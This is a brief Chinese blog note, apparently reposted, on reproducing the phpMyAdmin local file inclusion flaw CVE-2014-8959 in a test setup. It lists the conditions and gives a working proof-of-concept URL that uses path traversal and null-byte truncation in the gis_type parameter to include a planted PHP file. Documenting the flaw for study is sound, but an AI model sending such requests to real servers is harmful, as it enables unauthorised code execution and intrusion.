phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959) - 走看看

zoukankan html css js c++ java

phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)

最近想复现一些漏洞并分析，打算从phpmyadmin开始。

先搭建环境

phpmyadmin版本：4.0.3

php版本：5.2.17

利用条件：

登陆后台（个人感觉鸡肋），需要截断

上级目录下放一个test.txt，内容是<? phpinfo(); ?>

poc：http://localhost/phpmyadmin4.0.3/gis_data_editor.php?token=f10804504871328e0d74658cd0a5c1a2&gis_data[gis_type]=/../../../../test.txt%00

token要随情况变，登录之后有token

PS：等我有了代码审计的能力会再分析

查看全文

相关阅读:
调试相关blogs收集
 union和union all
V$SQLAREA
Oracle Access和filter的区别
 Oracle 复合索引设计原理——前缀性和可选性
 经济学原理---８应用：税收的代价--- 读书笔记
 经济学原理---7 消费者.生产者与市场效率--- 读书笔记
 经济学原理---6 供给.需求与政府政策--- 读书笔记
 经济学原理---5 弹性及其应用 --- 读书笔记
 CURL---常见问题

原文地址：https://www.cnblogs.com/BuFFERer/p/12273570.html

Copyright © 2011-2022 走看看